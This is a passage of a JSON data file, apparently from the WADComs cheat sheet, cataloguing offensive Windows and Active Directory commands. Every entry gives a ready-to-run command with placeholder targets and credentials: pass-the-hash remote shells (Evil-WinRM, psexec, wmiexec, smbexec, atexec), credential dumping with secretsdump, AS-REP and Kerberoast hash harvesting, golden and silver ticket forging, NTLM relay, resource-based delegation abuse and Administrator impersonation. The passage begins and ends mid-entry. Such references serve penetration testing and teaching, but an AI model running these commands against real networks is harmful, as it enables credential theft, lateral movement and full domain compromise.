a tool for enumerating information from Windows and Samba systems, using a number of different techniques. The following command will attempt to enumerate information using no credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"references":["https://github.com/CiscoCXSecurity/enum4linux"]},{"id":"wadcoms:Evil-WinRM-PTH","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-WinRM-PTH","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -u john -H c23b2e293fa0d312de6f59fd6d58eae3","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host. Evil-WinRM supports passing the victim's NT hash for authorization.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tNT Hash: c23b2e293fa0d312de6f59fd6d58eae3\n","mitre":[],"requires":["Username","Hash"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm"]},{"id":"wadcoms:Evil-WinRM","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-WinRM","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -u john -p password123","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm"]},{"id":"wadcoms:Evil-Winrm-PKINIT","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-Winrm-PKINIT","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -c pub.pem -k priv.pem -S -r EVILCORP","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host. Winrm Supports PKINIT, meaning if you have a computers PFX file, you can authenticate and get a shell. Note that the command requires a public and a private key in PEM format, that can be extracted by converting the PFX to PEM format. Take a look at the references for more info on that. Password protected PFX files can be cracked with JohnTheRipper.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tPFX File: cert.pfx\n\n\tDomain: EVILCORP\n","mitre":[],"requires":["PFX"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm","https://book.hacktricks.xyz/cryptography/certificates"]},{"id":"wadcoms:FindUncommonShares","toolId":"wadcoms:FindUncommonShares","toolName":"FindUncommonShares","name":"FindUncommonShares","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 FindUncommonShares.py -u 'john' -d 'TEST.local' -p 'password123' --dc-ip 10.10.10.1","description":"The script FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","Hash"],"services":["SMB"],"references":["https://github.com/p0dalirius/FindUncommonShares"]},{"id":"wadcoms:Impacket-DCOMExec","toolId":"wadcoms:Impacket-dcomexec","toolName":"Impacket-dcomexec","name":"Impacket-DCOMExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dcomexec.py -object MMC20 test.local/john:password123@10.10.10.1","description":"Impacket's dcomexec.py provides an interactive shell on the Windows host similar to wmiexec.py, but using varying DCOM endpoints.\n\nCurrently supports MMC20.Application, ShellWindows, and ShellBrowserWindow DCOM objects.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDCOM Object: MMC20\n","mitre":[],"requires":["Password","Username"],"services":["DCOM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/"]},{"id":"wadcoms:Impacket-Get-GPPPassword","toolId":"wadcoms:Impacket-Get-GPPPassword","toolName":"Impacket-Get-GPPPassword","name":"Impacket-Get-GPPPassword","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Enumeration"],"nativeCategory":["Exploitation","Enumeration"],"command":"python3 Get-GPPPassword.py 'TEST.local/john:password123@DC01.TEST.local' -dc-ip 10.10.10.1","description":"Python script to automatically extract and decrypt Group Policy Preferences (GPP) passwords using streams for carving files instead of mounting shares\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","Hash"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py","https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/"]},{"id":"wadcoms:Impacket-GetADUsers","toolId":"wadcoms:Impacket-GetADUsers","toolName":"Impacket-GetADUsers","name":"Impacket-GetADUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 GetADUsers.py -all test.local/john:password123 -dc-ip 10.10.10.1","description":"Impacket's GetADUsers.py will attempt to gather data about the domain's users and their corresponding email addresses.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetADUsers.py"]},{"id":"wadcoms:Impacket-GetNPUsers","toolId":"wadcoms:Impacket-GetNPUsers","toolName":"Impacket-GetNPUsers","name":"Impacket-GetNPUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt","description":"Impacket's GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user's password, which can then be cracked offline.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-GetUserSPNs","toolId":"wadcoms:Impacket-GetUserSPNs","toolName":"Impacket-GetUserSPNs","name":"Impacket-GetUserSPNs","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 GetUserSPNs.py test.local/john:password123 -dc-ip 10.10.10.1 -request","description":"Impacket's GetUserSPNs.py will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account's password, which can then be bruteforced offline.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-GoldenTicket","toolId":"wadcoms:Impacket-ticketer","toolName":"Impacket-ticketer","name":"Impacket-GoldenTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 john","description":"Impacket's ticketer.py can perform Golden Ticket attacks, which crafts a valid TGT ticket using a valid user's NTLM hash. It is then possible to access any service using the TGT by requesting a TGS for that service.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: b18b4b218eccad1c223306ea1916885f\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n","mitre":[],"requires":["Username","Hash"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-LookUpSID","toolId":"wadcoms:Impacket-lookupsid","toolName":"Impacket-lookupsid","name":"Impacket-LookUpSID","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 lookupsid.py test.local/john:password123@10.10.10.1","description":"Impacket's lookupsid.py performs bruteforcing of Windows SID's to identify users/groups on the remote target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py","https://www.puckiestyle.nl/impacket/"]},{"id":"wadcoms:Impacket-NTLMRelayX-Socks","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-Socks","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -socks","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command creates an SMB relay server that targets the IP 10.10.10.1, meaning any credentials that the SMB server recieves, gets relayed to that IP to attempt to authenticate and create a socks connection to the host. In order for the SMB server to recieve credentials to relay, dementor.py or Petitpotam can be used to trigger a forced authentication from the IP it's targeting to an attacker controlled SMB server.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"]},{"id":"wadcoms:Impacket-NTLMRelayX-WPAD","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-WPAD","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -t ldaps://dc.test.local -wh test-wpad --delegate-access","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command will perform WPAD spoofing to force the victim machine to authenticate to the attacker controlled host. The command will then relay the authentication to create a new computer object and grant it delegation rights to impersonate users on the victim machine. This command should be used in conjunction with mitm6.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"]},{"id":"wadcoms:Impacket-NTLMRelayX","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -c 'whoami /all' -debug","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command creates an SMB relay server that targets the IP 10.10.10.1, meaning any credentials that the SMB server recieves, gets relayed to that IP to attempt to authenticate and execute 'whoami /all'. In order for the SMB server to recieve credentials to relay, dementor.py can be used to trigger a forced authentication from the IP it's targeting to an attacker controlled SMB server.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"]},{"id":"wadcoms:Impacket-PsExec-PassTheTicket","toolId":"wadcoms:Impacket-psexec","toolName":"Impacket-psexec","name":"Impacket-PsExec-PassTheTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"export KRB5CCNAME=/full/path/to/john.ccache; python3 psexec.py test.local/john@10.10.10.1 -k -no-pass","description":"Impacket's psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host. psexec.py also allows using Service Tickets, saved as a ccache file for Authentication. It can be obtained via Impacket's GetST.py\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n","mitre":[],"requires":["TGS","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/","https://book.hacktricks.xyz/windows/active-directory-methodology/pass-the-ticket#pass-the-ticket-attack"]},{"id":"wadcoms:Impacket-PsExec","toolId":"wadcoms:Impacket-psexec","toolName":"Impacket-psexec","name":"Impacket-PsExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 psexec.py test.local/john:password123@10.10.10.1","description":"Impacket's psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/"]},{"id":"wadcoms:Impacket-RBCD","toolId":"wadcoms:Impacket-rbcd","toolName":"Impacket-rbcd","name":"Impacket-RBCD","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 rbcd.py -action write -delegate-to \"DC01$\" -delegate-from \"EVILCOMPUTER$\" -dc-ip 10.10.10.1 -hashes :A9FDFA038C4B75EBC76DC855DD74F0DA test.local/john","description":"Impacket rbcd.py will modify the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer with security descriptor of another computer.\nThe following command adds the related security descriptor of the created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of DC01.\nThis basically means that EVILCOMPUTER can get impersonated service tickets for DC01 using getST.py.\n\nCommand Reference:\n\n Target IP: 10.10.10.1\n\n Domain: test.local\n\n Username: john\n\n Hash: :A9FDFA038C4B75EBC76DC855DD74F0DA\n\n Delegate To: DC01$\n\n Delegate From: EVILCOMPUTER$\n","mitre":[],"requires":["Username","Hash"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rbcd.py","https://github.com/tothi/rbcd-attack"]},{"id":"wadcoms:Impacket-RPCDump","toolId":"wadcoms:Impacket-rpcdump","toolName":"Impacket-rpcdump","name":"Impacket-RPCDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 rpcdump.py test.local/john:password123@10.10.10.1","description":"Impacket's rpcdump.py enumerates Remote Procedure Call (RPC) endpoints.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-Reg","toolId":"wadcoms:Impacket-reg","toolName":"Impacket-reg","name":"Impacket-Reg","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 reg.py test.local/john:password123@10.10.10.1 query -keyName HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows -s","description":"Impacket's reg.py is a remote registry manipulation tool, providing similar functionality to reg.exe in Windows.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/reg.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SAMRDump","toolId":"wadcoms:Impacket-samrdump","toolName":"Impacket-samrdump","name":"Impacket-SAMRDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 samrdump.py test.local/john:password123@10.10.10.1","description":"Impacket's samrdump.py communicates with the Security Account Manager Remote (SAMR) interface to list system user accounts, available resource shares, and other sensitive information.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SMBClient","toolId":"wadcoms:Impacket-smbclient","toolName":"Impacket-smbclient","name":"Impacket-SMBClient","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 smbclient.py test.local/john:password123@10.10.10.1","description":"Impacket's smbclient.py is a generic smbclient, allowing you to list shares and files, rename, upload and download files and create and delete directories.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbclient.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SMBExec","toolId":"wadcoms:Impacket-smbexec","toolName":"Impacket-smbexec","name":"Impacket-SMBExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 smbexec.py test.local/john:password123@10.10.10.1","description":"Impacket's smbexec.py. This will give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py","https://www.varonis.com/blog/insider-danger-stealthy-password-hacking-with-smbexec/"]},{"id":"wadcoms:Impacket-SecretsDump-NTDS","toolId":"wadcoms:Impacket-secretsdump","toolName":"Impacket-secretsdump","name":"Impacket-SecretsDump-NTDS","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 secretsdump.py -ntds C:\\Windows\\NTDS\\ntds.dit -system C:\\Windows\\System32\\Config\\system -dc-ip 10.10.10.1 test.local/john:password123@10.10.10.2","description":"Impacket's secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to use the specified machines NTDS.dit and system file to extract the user account hashes associated with that machine.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.2\n\n\tDomain Controller: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"]},{"id":"wadcoms:Impacket-SecretsDump","toolId":"wadcoms:Impacket-secretsdump","toolName":"Impacket-secretsdump","name":"Impacket-SecretsDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 secretsdump.py test.local/john:password123@10.10.10.1","description":"Impacket's secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"]},{"id":"wadcoms:Impacket-Services","toolId":"wadcoms:Impacket-services","toolName":"Impacket-services","name":"Impacket-Services","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 services.py test.local/john:password123@10.10.10.1 list","description":"Impacket's services.py communicates with Windows services using the MSRPC interface. It can perform many different actions on any service.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tAction: list\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/services.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SilverTicket","toolId":"wadcoms:Impacket-ticketer","toolName":"Impacket-ticketer","name":"Impacket-SilverTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 -spn cifs/test.local john","description":"Impacket's ticketer.py can perform Silver Ticket attacks, which crafts a valid TGS ticket for a specific service using a valid user's NTLM hash. It is then possible to gain access to that service. The following command crafts a TGS for the SMB service, which can then be used to gain a shell.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: b18b4b218eccad1c223306ea1916885f\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tSMB Service: cifs\n","mitre":[],"requires":["Username","Hash"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-WMIExec","toolId":"wadcoms:Impacket-wmiexec","toolName":"Impacket-wmiexec","name":"Impacket-WMIExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 wmiexec.py test.local/john:password123@10.10.10.1","description":"Impacket's wmiexec.py uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["WMI"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#wmiexecpy"]},{"id":"wadcoms:Impacket-addcomputer-LDAPS","toolId":"wadcoms:Impacket-addcomputer","toolName":"Impacket-addcomputer","name":"Impacket-addcomputer-LDAPS","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 addcomputer.py -method LDAPS -dc-ip 10.10.10.1 -computer-pass TestPassword321 -computer-name testComputer test.local/john:password123","description":"Impacket's addcomputer.py will add a computer account to the domain and set its password. The following command will create a new computer over LDAPS. Plain LDAP is not supported, as it doesn't allow setting the password of the new computer.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tNew Computer Password: TestPassword123\n\n\tNew Computer Name: testComputer\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-addcomputer-SMB","toolId":"wadcoms:Impacket-addcomputer","toolName":"Impacket-addcomputer","name":"Impacket-addcomputer-SMB","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 addcomputer.py -method SAMR -dc-ip 10.10.10.1 -computer-pass TestPassword321 -computer-name testComputer test.local/john:password123","description":"Impacket's addcomputer.py will add a computer account to the domain and set its password. The following command will create a new computer over the SMB by specifying the `SAMR` method.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tNew Computer Password: TestPassword123\n\n\tNew Computer Name: testComputer\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-atexec-Creds","toolId":"wadcoms:Impacket-atexec","toolName":"Impacket-atexec","name":"Impacket-atexec-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 atexec.py test.local/john:password123@10.10.10.1 whoami","description":"Impacket's atexec.py uses the Task Scheduler service on the remote Windows host to execute the given command. It will create a windows task with a random name, trigger the task, and then delete it. The following command executes `whoami` on the remote Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCommand Executed: whoami\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"]},{"id":"wadcoms:Impacket-atexec-Hash","toolId":"wadcoms:Impacket-atexec","toolName":"Impacket-atexec","name":"Impacket-atexec-Hash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 test.local/john@10.10.10.1 whoami","description":"Impacket's atexec.py uses the Task Scheduler service on the remote Windows host to execute the given command. It will create a windows task with a random name, trigger the task, and then delete it. The following command executes `whoami` on the remote Windows host, authenticating with the hash of user `john`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76\n\n\tCommand Executed: whoami\n","mitre":[],"requires":["Hash","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"]},{"id":"wadcoms:Impacket-getST-Creds","toolId":"wadcoms:Impacket-getST","toolName":"Impacket-getST","name":"Impacket-getST-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123","description":"Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the `-impersonate` flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account and request a Service Ticket on its behalf for the `www` service on host `server01.test.local`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tService: www\n\n\tHost Name: server01.test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tImpersonated User: Administrator\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-getST-Hash","toolId":"wadcoms:Impacket-getST","toolName":"Impacket-getST","name":"Impacket-getST-Hash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 getST.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john","description":"Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the `-impersonate` flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account using the hashed password of user `john` and request a Service Ticket on its behalf for the `www` service on host `server01.test.local`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tService: www\n\n\tHost Name: 